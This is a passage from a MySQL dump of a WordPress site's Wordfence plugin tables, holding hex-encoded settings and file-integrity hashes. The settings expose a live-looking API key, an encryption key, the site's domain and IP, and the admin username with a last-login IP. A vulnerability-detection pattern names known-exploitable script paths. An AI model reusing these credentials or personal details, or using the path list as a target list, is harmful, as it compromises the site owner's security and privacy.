('apiKey', 0x35653835383332353537306463373164353737663630323633336665353961313861333361633935613838633536373361353637376464663132346464326161306638353931386638333461353733303739363033346362613735363862366263353563313433663938373263636532336137333663633462646362646131323936326531663332343863646466363231623161316539353237616363386665),
('maxMem', 0x323536),
('scan_exclude', ''),
('whitelisted', ''),
('bannedURLs', ''),
('maxExecutionTime', ''),
('howGetIPs', ''),
('actUpdateInterval', ''),
('alert_maxHourly', 0x30),
('loginSec_userBlacklist', ''),
('neverBlockBG', 0x6e65766572426c6f636b5665726966696564),
('loginSec_countFailMins', 0x323430),
('loginSec_lockoutMins', 0x323430),
('loginSec_strongPasswds', 0x70756273),
('loginSec_maxFailures', 0x3230),
('loginSec_maxForgotPasswd', 0x3230),
('maxGlobalRequests', 0x44495341424c4544),
('maxGlobalRequests_action', 0x7468726f74746c65),
('maxRequestsCrawlers', 0x44495341424c4544),
('maxRequestsCrawlers_action', 0x7468726f74746c65),
('maxRequestsHumans', 0x44495341424c4544),
('maxRequestsHumans_action', 0x7468726f74746c65),
('max404Crawlers', 0x44495341424c4544),
('max404Crawlers_action', 0x7468726f74746c65),
('max404Humans', 0x44495341424c4544),
('max404Humans_action', 0x7468726f74746c65),
('maxScanHits', 0x44495341424c4544),
('maxScanHits_action', 0x7468726f74746c65),
('blockedTime', 0x333030),
('email_summary_interval', 0x62697765656b6c79),
('email_summary_excluded_directories', 0x77702d636f6e74656e742f63616368652c77702d636f6e74656e742f776663616368652c77702d636f6e74656e742f706c7567696e732f776f726466656e63652f746d70),
('encKey', 0x32353266636533393739666437386366),
('vulnRegex', 0x2f283f3a776f726466656e63655f746573745f76756c6e5f6d617463687c5c2f74696d7468756d625c2e7068707c5c2f7468756d625c2e7068707c5c2f7468756d62735c2e7068707c5c2f7468756d626e61696c5c2e7068707c5c2f7468756d626e61696c735c2e7068707c5c2f7468756d6e61696c735c2e7068707c5c2f63726f707065725c2e7068707c5c2f70696373697a655c2e7068707c5c2f726573697a65725c2e7068707c636f6e6e6563746f72735c2f75706c6f6164746573745c2e68746d6c7c636f6e6e6563746f72735c2f746573745c2e68746d6c7c6d696e676c65666f72756d616374696f6e7c75706c6f61646966795c2e7068707c616c6c7765626d656e75732d776f726470726573732d6d656e752d706c7567696e7c77702d6379636c652d706c61796c6973747c636f756e742d7065722d6461797c77702d6175746f796f75747562657c7061792d776974682d74776565747c636f6d6d656e742d726174696e675c2f636b2d70726f636573736b61726d615c2e706870292f69),
('welcomeClosed', 0x31),
('wf_summaryItems', 0x613a31363a7b733a31303a22746f74616c5573657273223b693a333b733a31303a22746f74616c5061676573223b733a323a223130223b733a31303a22746f74616c506f737473223b733a313a2231223b733a31333a22746f74616c436f6d6d656e7473223b733a333a22313435223b733a31353a22746f74616c43617465676f72696573223b733a313a2231223b733a31313a22746f74616c5461626c6573223b693a35373b733a393a22746f74616c526f7773223b693a34343731313b733a31323a22746f74616c506c7567696e73223b693a31343b733a31303a226c617374557064617465223b693a313439323332303236323b733a31313a22746f74616c5468656d6573223b693a343b733a393a22746f74616c44617461223b733a383a2233372e3638204d42223b733a31303a22746f74616c46696c6573223b693a323431313b733a393a22746f74616c44697273223b693a3334393b733a31303a226c696e65734f66504850223b693a3339363339323b733a31303a226c696e65734f664a4348223b693a3131333738333b733a383a227363616e54696d65223b643a313439323332303236322e3039343730353130343832373838303835393337353b7d),
('tourClosed', 0x31),
('totalScansRun', 0x31333335),
('wfKillRequested', 0x30),
('currentCronKey', ''),
('wf_scanRunning', ''),
('wfStatusStartMsgs', 0x613a31333a7b693a303b733a303a22223b693a313b733a303a22223b693a323b733a303a22223b693a333b733a303a22223b693a343b733a303a22223b693a353b733a303a22223b693a363b733a303a22223b693a373b733a303a22223b693a383b733a303a22223b693a393b733a303a22223b693a31303b733a303a22223b693a31313b733a303a22223b693a31323b733a303a22223b7d),
('wf_dnsCNAME', 0x7777772e63726f7373747261696e696e6763656e7465722e626520706f696e747320746f2063726f7373747261696e696e6763656e7465722e6265),
('wf_dnsA', 0x63726f7373747261696e696e6763656e7465722e626520706f696e747320746f203231332e3138362e33332e33),
('wf_dnsMX', ''),
('wf_dnsLogged', 0x31),
('lastScanCompleted', 0x6f6b),
('wfPeakMemory', 0x3735373836343438),
('totalLoginHits', 0x313037303032),
('totalLogins', 0x36),
('lastAdminLogin', 0x613a363a7b733a363a22757365724944223b693a313b733a383a22757365726e616d65223b733a353a2261646d696e223b733a393a2266697273744e616d65223b733a303a22223b733a383a226c6173744e616d65223b733a303a22223b733a343a2274696d65223b733a32363a2253756e2031367468204a756c7920402030373a35363a3131414d223b733a323a224950223b733a31343a2236322e3233352e3231352e323331223b7d),
('totalAlertsSent', 0x35363838),
('lastScheduledScanStart', 0x31343932333230323330),
('totalCommentsFiltered', 0x3430),
('total503s', 0x3431333339),
('totalIPsBlocked', 0x3330393737),
('totalIPsLocked', 0x35363833),
('wfsd_engine', ''),
('totalIPsThrottled', 0x31),
('totalSpamStopped', 0x31);

-- --------------------------------------------------------

--
-- Structure de la table `wp_wfCrawlers`
--

CREATE TABLE `wp_wfCrawlers` (
  `IP` int(10) UNSIGNED NOT NULL,
  `patternSig` binary(16) NOT NULL,
  `status` char(8) NOT NULL,
  `lastUpdate` int(10) UNSIGNED NOT NULL,
  `PTR` varchar(255) DEFAULT ''
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

-- --------------------------------------------------------

--
-- Structure de la table `wp_wfFileMods`
--

CREATE TABLE `wp_wfFileMods` (
  `filenameMD5` binary(16) NOT NULL,
  `filename` varchar(1000) NOT NULL,
  `knownFile` tinyint(3) UNSIGNED NOT NULL,
  `oldMD5` binary(16) NOT NULL,
  `newMD5` binary(16) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `wp_wfFileMods`
--

INSERT INTO `wp_wfFileMods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`) VALUES
(0x8052c42ab3b8aa06a3f5f788a4ddccc2, '.htaccess', 0, 0x8c1339b1053ad881452f3b9d6b66916e, 0x8c1339b1053ad881452f3b9d6b66916e),
(0x828e0013b8f3bc1bb22b4f57172b019d, 'index.php', 1, 0x00000000000000000000000000000000, 0xb61b25303be0f573a6b9446d5cbe3a5b),
(0x98cd14c95bb22f9d397da0603a77d950, 'license.txt', 1, 0x00000000000000000000000000000000, 0x732b8b10f9f4e8af61ab94c713580149),
(0x92a36320069a227bd1685020739dab61, 'map.png', 0, 0x5871fb8eb996f24690a2c5f2c388b291, 0x5871fb8eb996f24690a2c5f2c388b291),
(0xb9a2b8cad8e565582e3a4c1d77f1efb7, 'ok.png', 0, 0x7f350ea7098e05a18bf2bfa268975c39, 0x7f350ea7098e05a18bf2bfa268975c39),
(0x61a73fa3aa5fd7cba2bed0366aa8ec58, 'readme.html', 1, 0x00000000000000000000000000000000, 0x77de437f7578bc09cec06e7938606ecd),
(0xc70b67cc511a9d2895f4ccddae5dec61, 'reservation1.html', 0, 0xcbdaea6e8867b1a154aedbeeb22c0357, 0xcbdaea6e8867b1a154aedbeeb22c0357),
(0x6683d2f51dbcbd25028f8aeed877acf5, 'style_client.css', 0, 0x4c5761d67a95291d57767d26475716f3, 0x4c5761d67a95291d57767d26475716f3),
(0xe7c3d54bff679bd0e5876f1b23e71330, 'wp-activate.php', 1, 0x00000000000000000000000000000000, 0xb94e5f17ca85eea62dd8ff75a2c15058),
(0x2d87ba2937a63579b03863dae25776d8, 'wp-admin/about.php', 1, 0x00000000000000000000000000000000, 0x8fa00b6b26f7b273beaf9f1b16264bd9),
(0x0e58ffe648e5a5a528bb3ac85aeda914, 'wp-admin/admin-ajax.php', 1, 0x00000000000000000000000000000000, 0x62ccd06473f414a9d9ec4ac575d26afd),
(0x213162dd8539a0aa2ae3c0ff5c11e1c6, 'wp-admin/admin-footer.php', 1, 0x00000000000000000000000000000000, 0x283fbda7e385fe39698373bc1f66f028),
(0x1510c84b55f567304d55bf2f9af6ca87, 'wp-admin/admin-functions.php', 1, 0x00000000000000000000000000000000, 0x9bdf60c84e3543672bc0e28e2c50bebf),
(0x40e86dbeb7ebc54f0c1208c5dd571201, 'wp-admin/admin-header.php', 1, 0x00000000000000000000000000000000, 0x0e31022b47e58c0d2bac84dad755bc5c),
(0xed5d9a1da740830a97ab3ec4baee596e, 'wp-admin/admin-post.php', 1, 0x00000000000000000000000000000000, 0xbf1e28687e173632da8193bb120a2dd6),
(0x0b941d7f88a62c482862e6105f46944f, 'wp-admin/admin.php', 1, 0x00000000000000000000000000000000, 0x4827423650b376ae143c0af93898dde7),
(0x0958ce740c5c34764e493582d86acbc2, 'wp-admin/async-upload.php', 1, 0x00000000000000000000000000000000, 0x4f712b2bbe2ea0dddce91ab287a697a6),
(0x22d3c4360d0c2b4b137bd7181a216105, 'wp-admin/comment.php', 1, 0x00000000000000000000000000000000, 0xb49faed8f0c5dd253185cca31ad69701),
(0x6b4dcffc969ca69a020ceecc99597370, 'wp-admin/credits.php', 1, 0x00000000000000000000000000000000, 0x81cf111556acf02d6bd097c110b44f9c),
(0xefc010fb50868961600e5875eea5a106, 'wp-admin/css/color-picker-rtl.css', 1, 0x00000000000000000000000000000000, 0x96caf0347b9d3d8caf8fe65fff4d7ca2),
(0x11d272881f57eaae33a899e3e1a5be56, 'wp-admin/css/color-picker-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x35a559a8d3f4dddca3af16ae66c3cf9a),
(0x46f3c2ef3fe689433b248ce948190d0d, 'wp-admin/css/color-picker.css', 1, 0x00000000000000000000000000000000, 0xb90e7baca3cbec8c1d5a11da060bcdfd),
(0x150f98afdca139ee755f5c0ac339c127, 'wp-admin/css/color-picker.min.css', 1, 0x00000000000000000000000000000000, 0x9d746a565ddc0e7ad9f9521644289b90),
(0xdd1c3e8f765e2feeec770a8868d4db00, 'wp-admin/css/colors-classic.css', 1, 0x00000000000000000000000000000000, 0xee29aa2dc15802e0907872be559c742f),
(0xe3f22293d05f69a1417afb3eb4358737, 'wp-admin/css/colors-classic.min.css', 1, 0x00000000000000000000000000000000, 0xee2d3f9b681056eb0c8c1a1703c110b2),
(0x18f9426f0fadb9f775302a1d70611b17, 'wp-admin/css/colors-fresh.css', 1, 0x00000000000000000000000000000000, 0xc4b004c430b5ef1d2bacd01b098e4a60),
(0x38015694287133ebaaca76033e6df595, 'wp-admin/css/colors-fresh.min.css', 1, 0x00000000000000000000000000000000, 0xe67f2d5d990caf64736f32b9ca54a950),
(0xf3ff56ac936b39dbb4ee73bfbb80d6bf, 'wp-admin/css/customize-controls-rtl.css', 1, 0x00000000000000000000000000000000, 0xd7feb34b845f1fa5530a4c51d27bdab1),
(0xcd0fa9ffe1877011f76ad69b6092c877, 'wp-admin/css/customize-controls-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x6a01df682595d7c10ce1380a2faeab21),
(0x8c3f9a0a35fcb448e33fe2e0c1c0e0e8, 'wp-admin/css/customize-controls.css', 1, 0x00000000000000000000000000000000, 0xdfa6a9415541755284ed912ba66a47ba),
(0xfa2ed5b6bbd5f15a67027bda3df19acc, 'wp-admin/css/customize-controls.min.css', 1, 0x00000000000000000000000000000000, 0xad658adc879ba1db73141c9fa0b5c67d),
(0xabc2abace4972d6a3db475b64e5c7127, 'wp-admin/css/farbtastic.css', 1, 0x00000000000000000000000000000000, 0x90e8ee437da5a2fa7bd428a67182a198),
(0xb58df8a70584a1c96b4dd4d53fca7558, 'wp-admin/css/ie-rtl.css', 1, 0x00000000000000000000000000000000, 0x879bad5fb1d6485b6d9b773c53771c36),
(0x1c7603739d25c27aa1efb4faf8be46d3, 'wp-admin/css/ie-rtl.min.css', 1, 0x00000000000000000000000000000000, 0xa3c0334eac78e5a18d33185363c6bc50),
(0x0445f82617afd1564e05aeb30891224e, 'wp-admin/css/ie.css', 1, 0x00000000000000000000000000000000, 0x17aae68019209c421bfa960a427905e2),
(0x06d1a79b045f8334156121a246a401f1, 'wp-admin/css/ie.min.css', 1, 0x00000000000000000000000000000000, 0xc48f03938beb59b2bc71921974abd386),
(0x3c8f8939fe75fe6ab3aeff8421c1240f, 'wp-admin/css/install.css', 1, 0x00000000000000000000000000000000, 0xb5a5602923179daa9c75b75e47fd1174),
(0x83e2e8ca86d7e9906ea544e3ae96cb28, 'wp-admin/css/install.min.css', 1, 0x00000000000000000000000000000000, 0x873132014ec1c1918ee9fbc06e0de909),
(0x72f90fce0a97db62b0952315f0a9e97f, 'wp-admin/css/media-rtl.css', 1, 0x00000000000000000000000000000000, 0xed5e5527b5bd5a5bca516e801dc1dc0b),
(0xc17addbfe4af2658e29d9936a498cc73, 'wp-admin/css/media-rtl.min.css', 1, 0x00000000000000000000000000000000, 0xa3f07d2e699aff8d66db9352172f3c41),
(0x988da3fd549db94489c046d24b3106c7, 'wp-admin/css/media.css', 1, 0x00000000000000000000000000000000, 0x163d75e9faf70bf4e002638b746af26d),
(0x25d01550622eceffba38ba4764ce74cd, 'wp-admin/css/media.min.css', 1, 0x00000000000000000000000000000000, 0xc997f050f7bb25caf1818ea0f28ed4a4),
(0x8eb0d6975d4e528dbcef537b71763f85, 'wp-admin/css/wp-admin-rtl.css', 1, 0x00000000000000000000000000000000, 0x95137319acf4e217d0b193768155c9fa),
(0xb586bb2428ad678b28c1aed450dae72f, 'wp-admin/css/wp-admin-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x990c061c85fc81736b9c6befac3b5c77),
(0x64e8348f6ae0320b55c2568eb724f650, 'wp-admin/css/wp-admin.css', 1, 0x00000000000000000000000000000000, 0xf0894fa9c9733d0e577fc5beddc726cd),
(0xd7c76a3096a9de77fe06457dc2ae529f, 'wp-admin/css/wp-admin.min.css', 1, 0x00000000000000000000000000000000, 0xddc1a40f07fa0698af312e2793e4cb41),
(0xb98c3f83307cc3f6e03575c6a18301be, 'wp-admin/custom-background.php', 1, 0x00000000000000000000000000000000, 0xd8a2b5b1eb6c74b18c1fd9c4f71871f6),
(0x75e171671a008738896803d4adfb00f0, 'wp-admin/custom-header.php', 1, 0x00000000000000000000000000000000, 0xc24efd8bdfc0ade18afc2961732602c4),
(0xaa3b133f32e8e18853fde3a700fb9a70, 'wp-admin/customize.php', 1, 0x00000000000000000000000000000000, 0xd5f8ec98103813f0a24f3b270d472907),
(0x9eee703f455ea240b7278ce3501245c5, 'wp-admin/edit-comments.php', 1, 0x00000000000000000000000000000000, 0x96f7ca9afc0f3b4c646204bdd8df1267),
(0xe60df2625cf19989c4c98db21ac412eb, 'wp-admin/edit-form-advanced.php', 1, 0x00000000000000000000000000000000, 0xc1ac581c9da2856a0f10888e459dabed),
(0x479637181a089ee6b249263aed190778, 'wp-admin/edit-form-comment.php', 1, 0x00000000000000000000000000000000, 0x187b18d2fabae997290234653719c014),
(0x0a93b591622dd356f83a88837c6db5ff, 'wp-admin/edit-link-form.php', 1, 0x00000000000000000000000000000000, 0xf28a4ef058b09d340ff761fd004dfd52),
(0x25ba0cd2e0eb380e5e1b9c563cd174cb, 'wp-admin/edit-tag-form.php', 1, 0x00000000000000000000000000000000, 0xc9d740cbe2b32377e259b67703aa4b91),
(0xbe8a68a2dddf29554740c87896cc7609, 'wp-admin/edit-tags.php', 1, 0x00000000000000000000000000000000, 0x64b7bb6ef758064e03a2e4a693466338),
(0x59854c61d80e1f181180b56818d02801, 'wp-admin/edit.php', 1, 0x00000000000000000000000000000000, 0x9e6709e38ec99e8ac1e4823c54dcadef),
(0xc2c0318c92c17cb80f7d9a94e264511d, 'wp-admin/export.php', 1, 0x00000000000000000000000000000000, 0x6ea11edc4d03d41fcd6d1c2b4ad813b9),
(0x4fa783b5e026c27281e8938f951eea20, 'wp-admin/freedoms.php', 1, 0x00000000000000000000000000000000, 0x877280a03359bccd8ee7cadbe9baac5e),
(0x73d9e48f72674b3f6946c347634925d0, 'wp-admin/images/about-globe-2x.png', 1, 0x00000000000000000000000000000000, 0x3003678c6ccc6f4c874f01e58dee454b),
(0x41e6e5c14bcb8d460b22735a7c2b93b5, 'wp-admin/images/about-search-2x.png', 1, 0x00000000000000000000000000000000, 0xae40cbce246b6f3ea4d95b05939a92d6),
(0x3e2f0e19bfa2bcfc151ed794bbe6ef58, 'wp-admin/images/about-updates-2x.png', 1, 0x00000000000000000000000000000000, 0xc041e28a6ea33aa206cf9b43c3b1f428),
(0xe6ce57fbeac322fadaea01536b073acd, 'wp-admin/images/align-center-2x.png', 1, 0x00000000000000000000000000000000, 0x9ebeb22df3728735042a4a37a1496611),
(0x262a83cac464c486d6b88f0905d64835, 'wp-admin/images/align-center.png', 1, 0x00000000000000000000000000000000, 0x09d91addb6b53479e68c645931d9658e),
(0xf65639b4d44bb1e1c4676f58b1b937d3, 'wp-admin/images/align-left-2x.png', 1, 0x00000000000000000000000000000000, 0x698538b14fb9839aecd01d5e97c66316),
(0xe9aaca6dac164d1e74a88604db57b342, 'wp-admin/images/align-left.png', 1, 0x00000000000000000000000000000000, 0x5cfd7930cffa6412f75af26f2e689ed4),
(0xd45d7f2ef56f6ff0c8a6074d2d6e0987, 'wp-admin/images/align-none-2x.png', 1, 0x00000000000000000000000000000000, 0xf858439905295bd705b09b2dba3418bd),
(0x4d57800912e510a6be1f3ac9e498d98a, 'wp-admin/images/align-none.png', 1, 0x00000000000000000000000000000000, 0xf1ad65716432a0a1da7591a5c2f10d04),
(0x76e247822ec267b741f5c62306f572e9, 'wp-admin/images/align-right-2x.png', 1, 0x00000000000000000000000000000000, 0x6883026cbd3e72ba5da36c57c60fc078),
(0xc3cd746e529fd894c0e1afcec6255e81, 'wp-admin/images/align-right.png', 1, 0x00000000000000000000000000000000, 0x42d8f3e2874f6523d36c403a502b2276),
(0x995b82179fae514822705331c8aaeb63, 'wp-admin/images/arrows-2x.png', 1, 0x00000000000000000000000000000000, 0x972051f086017dcef17964622336840b),
(0x38e05f5debfe3ec6efa62e6e90082974, 'wp-admin/images/arrows-dark-2x.png', 1, 0x00000000000000000000000000000000, 0xbc97d62061c943dd6ff71d964c7d8425),
(0xfe8f59b628c5355831c1a281d4ac8297, 'wp-admin/images/arrows-dark-vs-2x.png', 1, 0x00000000000000000000000000000000, 0xbf96d253f8dfcad84f9d649de07dd797),
(0xababf51d961938c7ce5d210250f8d4c3, 'wp-admin/images/arrows-dark-vs.png', 1, 0x00000000000000000000000000000000, 0xa7bd090aa6d1cd54ec9f2a9ccc1043db),
(0xcfb3400b5934caa95183a7ca0be0e489, 'wp-admin/images/arrows-dark.png', 1, 0x00000000000000000000000000000000, 0x8b77c74d3b2eec1f50bb59ae34bdb5ff),
(0xc3cbb2072330829911dff661e156b01f, 'wp-admin/images/arrows-pr-2x.png', 1, 0x00000000000000000000000000000000, 0xb008e43aab25a6a2cd4ef2f0a5c4bfba),
(0xa89aca43ff6825b6354478d89724456a, 'wp-admin/images/arrows-pr.png', 1, 0x00000000000000000000000000000000, 0xdf60fed3e762a0b86903b629f90ffd79),
(0x1ec6f9d598b4a76029d07a161d66bc30, 'wp-admin/images/arrows-vs-2x.png', 1, 0x00000000000000000000000000000000, 0x550a69654948fc739ae5f9a537106cb4),
(0x8efc6671c81b399a0434166c80d92da2, 'wp-admin/images/arrows-vs.png', 1, 0x00000000000000000000000000000000, 0x7d5abe2a367e42e87482743521166c1f),
(0xd345236cf0c24cfee65f26dcaab3c2ef, 'wp-admin/images/arrows.png', 1, 0x00000000000000000000000000000000, 0x7fda76920124f03e88d1dfd93e03bf59),
(0x47803971f3f1eb3dcaa55b333f1961e8, 'wp-admin/images/bubble_bg-2x.gif', 1, 0x00000000000000000000000000000000, 0x1a76a1434d972ee849b119e69cd3f2ba),
(0x0e0bdb7d08e75267ef179ad6435abcc2, 'wp-admin/images/bubble_bg-rtl-2x.gif', 1, 0x00000000000000000000000000000000, 0x507ddcae331a55002d8e006a8ea0504c),
(0x501c28d4e672832cdaab80b57025ef71, 'wp-admin/images/bubble_bg-rtl.gif', 1, 0x00000000000000000000000000000000, 0x0acb13b5fb21466f3984a5a3bdfc3869),
(0x51756f145058d8d80005ab15b853da9e, 'wp-admin/images/bubble_bg.gif', 1, 0x00000000000000000000000000000000, 0xb78fd5758e486128cf448c5973ca6ee4),
(0xd2d54c7435393396755e98ebe429d9d4, 'wp-admin/images/comment-grey-bubble-2x.png', 1, 0x00000000000000000000000000000000, 0xe1334238affb186ad35b2a79f8739e94),
(0x05a2d81bc01d65df6257fc4130cf1e64, 'wp-admin/images/comment-grey-bubble.png', 1, 0x00000000000000000000000000000000, 0x8f59128f2a27b489b0a974c0b6b21046),
(0x10cf4915a2d85c6ab6acd178cccdcb67, 'wp-admin/images/date-button-2x.gif', 1, 0x00000000000000000000000000000000, 0x5d78ee005f9f25fad855bef396a5e822),
(0xfdcd6184ed274054e791938903f5d6ca, 'wp-admin/images/date-button.gif', 1, 0x00000000000000000000000000000000, 0x946eeed3973aa98d1833849d9a4bf8da),
(0x8f6a254dbbc98df2d17017295a89c40b, 'wp-admin/images/generic.png', 1, 0x00000000000000000000000000000000, 0xf88e1b95ff278a5b231f39380b211ed0),
(0xc81a7b0867ddfc3f17d13367daa21abd, 'wp-admin/images/icons32-2x.png', 1, 0x00000000000000000000000000000000, 0x749a56fae96141ff576bb99c4037ebd9),
(0x9fce1b9626bfa24ec22cf5a5ef8c3650, 'wp-admin/images/icons32-vs-2x.png', 1, 0x00000000000000000000000000000000, 0x4487c15d43389e88b3694803e2beaeb7),
(0x87ab4c209d55ffd5c0b966afe075e23c, 'wp-admin/images/icons32-vs.png', 1, 0x00000000000000000000000000000000, 0xd5a8c1950e1a20172151f463c8d9d489),
(0xc231a88c575628329f9836b284b31594, 'wp-admin/images/icons32.png', 1, 0x00000000000000000000000000000000, 0xdb0235502fde48e086e206c574c8adae),
(0x124cd6c4fcfd38e0ef80f55ca8ddbc2b, 'wp-admin/images/imgedit-icons-2x.png', 1, 0x00000000000000000000000000000000, 0x22675b63c33b6e9b2a63e84018f44a0e),
(0x7bf5871f903fecd1d5fc0d92da0a1b27, 'wp-admin/images/imgedit-icons.png', 1, 0x00000000000000000000000000000000, 0x45cbcb9891d6bcbf796e50fb6a6112db),
(0xa23467818c651fcad8e93ea9f3d3df9d, 'wp-admin/images/list-2x.png', 1, 0x00000000000000000000000000000000, 0x68d5bb134953c23217fdd36982679a0c),
(0xade25a0a7504d56f4bb020afb6543b65, 'wp-admin/images/list.png', 1, 0x00000000000000000000000000000000, 0x1e123e96bd2a1ce2c0d3b305d153f1c3),
(0x1c29fa4de6c85ef0b6c3bb6f7af0a905, 'wp-admin/images/loading.gif', 1, 0x00000000000000000000000000000000, 0x9a8269421303631316be4ab5e34870e1),
(0x54da19bafdaceb47369305f9f33d5093, 'wp-admin/images/lock-2x.png', 1, 0x00000000000000000000000000000000, 0x6e0a92872a2545f5bf44bf7e3daa73c1),
(0x2fc3c1a67fa03e39dbfbe46cd6c2a16d, 'wp-admin/images/lock.png', 1, 0x00000000000000000000000000000000, 0x1acca50f0abf4ccd7a0f34669815158a),
(0xbb00b2d725335b247800e8e22eb08e28, 'wp-admin/images/marker.png', 1, 0x00000000000000000000000000000000, 0x3e9aa4c85a09fe868e23d2ffb260df46),
(0x40de3b358b5811f5f156a87f944fc65a, 'wp-admin/images/mask.png', 1, 0x00000000000000000000000000000000, 0xfcf693677ea822e6d24af7b2e4a98e99),
(0x40f773028d5af6945e99a5d3e8718d76, 'wp-admin/images/media-button-2x.png', 1, 0x00000000000000000000000000000000, 0x23db5749e51d85105cb8d03fc81305c9),
(0x31dc456651a4762329f30ad930456b51, 'wp-admin/images/media-button-image.gif', 1, 0x00000000000000000000000000000000, 0x538670efb6e78fcfdd4662623be4e675),
(0x615c632c49223554cd05b123cc8b1ffe, 'wp-admin/images/media-button-music.gif', 1, 0x00000000000000000000000000000000, 0x423f910219d605ddd355681816a08b45),
(0x014e519e222a687a1caa72c3777c1af8, 'wp-admin/images/media-button-other.gif', 1, 0x00000000000000000000000000000000, 0x94e0e87b48fc4c7830164d48cfb41e7f),
(0xfe1bfdfe819c03297a5d213fbbb161c0, 'wp-admin/images/media-button-video.gif', 1, 0x00000000000000000000000000000000, 0xba34507befaa9b9b06e96c6c846bab69),
(0x61299e544d57e1b84f6f88b851947cdc, 'wp-admin/images/media-button.png', 1, 0x00000000000000000000000000000000, 0xb2b6c3e336054070e8927a5e7965f3ce),
(0x0522929f4edfac6a6a29859f008c954e, 'wp-admin/images/menu-2x.png', 1, 0x00000000000000000000000000000000, 0x197eb3dfa27be4df10b35a57c0a7dde7),
(0xc5952d3e0f5854bea2fc60d3b26c310e, 'wp-admin/images/menu-shadow-rtl.png', 1, 0x00000000000000000000000000000000, 0x6238d00c97d2f2fb553405d2cbd800b5),
(0xa52cd17b80842c65629aeed652c6585f, 'wp-admin/images/menu-shadow.png', 1, 0x00000000000000000000000000000000, 0x91c68df0c5f4d4b84de19f51dbe4f3b7),
(0x2a2061d846b2cc19f0349fb075db7655, 'wp-admin/images/menu-vs-2x.png', 1, 0x00000000000000000000000000000000, 0xa1331c4faa15c8d6fcb800eeec4c5500),
(0x0215745d95d99f75c3d575dbfce56afb, 'wp-admin/images/menu-vs.png', 1, 0x00000000000000000000000000000000, 0x73affbee3e5e3aec19199a657b4f88f7),
(0x40ba58440ac30a524e867f9074ebcdd3, 'wp-admin/images/menu.png', 1, 0x00000000000000000000000000000000, 0x48b8c0d56811b724ea34d7f052a126b3),
(0xeb462019f338c72bb229d0d872dd50e8, 'wp-admin/images/no.png', 1, 0x00000000000000000000000000000000, 0xc86bbf1c64c924f99fdc9f5637f0c08b),
(0xb513e5b5152b449e46dcbf545a5b4837, 'wp-admin/images/post-formats-vs.png', 1, 0x00000000000000000000000000000000, 0x24726acea48e9bffc1744638f2d1f666),
(0xe300bc95d7956f786933250d2b5d6b67, 'wp-admin/images/post-formats.png', 1, 0x00000000000000000000000000000000, 0xcf8cdb0bc623dee2e18898b44b11744c),
(0x6e0e0e5dfb6a16373c331349537351df, 'wp-admin/images/post-formats32-vs.png', 1, 0x00000000000000000000000000000000, 0xb6c98d25500180cc6604d155f67651f7),
(0xcec593fefafacf94f2031f3d9fba2336, 'wp-admin/images/post-formats32.png', 1, 0x00000000000000000000000000000000, 0xfbbcf81a2b6ce7e9e419fb639a8a2a24),
(0x59f5da7edac7e5e109366e1fd232d015, 'wp-admin/images/press-this-2x.png', 1, 0x00000000000000000000000000000000, 0x8be606bebfbff936f7d6ac3927be1337),
(0xaa05d44cf33da30c9c6b3c2d261ec897, 'wp-admin/images/press-this.png', 1, 0x00000000000000000000000000000000, 0xbeef1f704b00931544c0ddb07933c498),
(0xf2b63f7b6f0b5fb1b0b527bb186ed611, 'wp-admin/images/resize-2x.gif', 1, 0x00000000000000000000000000000000, 0x83e904eb31b68fa48cfdbcaa64ef2966),
(0xac3321390b16e43de8369d0c12dda10f, 'wp-admin/images/resize-rtl-2x.gif', 1, 0x00000000000000000000000000000000, 0xfcd61114e538d359a80d419d6554f55e),
(0x8849dd7b8b3fbb8672f45daf1e1da037, 'wp-admin/images/resize-rtl.gif', 1, 0x00000000000000000000000000000000, 0xddaa579f547c7877730ae2a599a0a0df),
(0x7e3fa14abc49d6622a15d7baea65e843, 'wp-admin/images/resize.gif', 1, 0x00000000000000000000000000000000, 0x68a8e57741df1a16444713a11d7c5b82),
(0x0a669d868959a1b703023426fc4cf0a6, 'wp-admin/images/se.png', 1, 0x00000000000000000000000000000000, 0xd6c89442c360bd1e08da2e7d1527373a),
(0x58973a382b7fcb93323e565daccb38e0, 'wp-admin/images/sort-2x.gif', 1, 0x00000000000000000000000000000000, 0xe07d0440c2d59e252b64f10bd293f897),
(0xdd5b36bb02358084112bc809e16e39e4, 'wp-admin/images/sort.gif', 1, 0x00000000000000000000000000000000, 0x2bf510e2b04bacc1677a7a04dc318abf),
(0x50de3124b61b1b89f3025c170f2ae543, 'wp-admin/images/stars-2x.png', 1, 0x00000000000000000000000000000000, 0xf5ea4194a79c23e653b24d0c65032e5e),
(0x48b365b19a9484469245325975000b4d, 'wp-admin/images/stars-rtl-2x.png', 1, 0x00000000000000000000000000000000, 0x6ec2333cc32894b25402a1d21924a6c9),
(0xec9114c751cff5fa37c10bf9717de9d4, 'wp-admin/images/stars-rtl.png', 1, 0x00000000000000000000000000000000, 0xa3c107d957897a323b9801eb7a0479ad),
(0xe946ce6a2159e97b072e4a3d2cb5ae12, 'wp-admin/images/stars.png', 1, 0x00000000000000000000000000000000, 0x5bace01f99903e3cf56bb27bd2ec2891),
(0xff344dee0800d549472818e203124cfb, 'wp-admin/images/welcome-icons-2x.png', 1, 0x00000000000000000000000000000000, 0x520a173799e42122f793bed6c3c8fd64),
(0x42cbc522cccbf4f0509ccc2ac973c511, 'wp-admin/images/welcome-icons.png', 1, 0x00000000000000000000000000000000, 0xebbeff45f2fee9bef30233451be6c87f),
(0xc62b92a0cd67d405bec27136a55e00e8, 'wp-admin/images/wheel.png', 1, 0x00000000000000000000000000000000, 0x18568b368b3c5dfe7b67017a1ac3d329),
(0x3c7a369183c9fbfc4b0f700235f961a1, 'wp-admin/images/wordpress-logo-2x.png', 1, 0x00000000000000000000000000000000, 0x784aa9fed2f19f1607cae85205507163),
(0x05745a518fa5597a3085fabddfe8b7ab, 'wp-admin/images/wordpress-logo.png', 1, 0x00000000000000000000000000000000, 0xc6b0f979b9e66fc338f4cb3853a5608a),
(0x1f50d7b03a22b77d72a24239a335cce2, 'wp-admin/images/wp-badge-2x.png', 1, 0x00000000000000000000000000000000, 0x958efa9f64653d25a424ad21cd16dac1),
(0xf0ec81fc67cebb713b5da3ae486fbdc7, 'wp-admin/images/wp-badge.png', 1, 0x00000000000000000000000000000000, 0x73b244635671611458e874a20707135d),
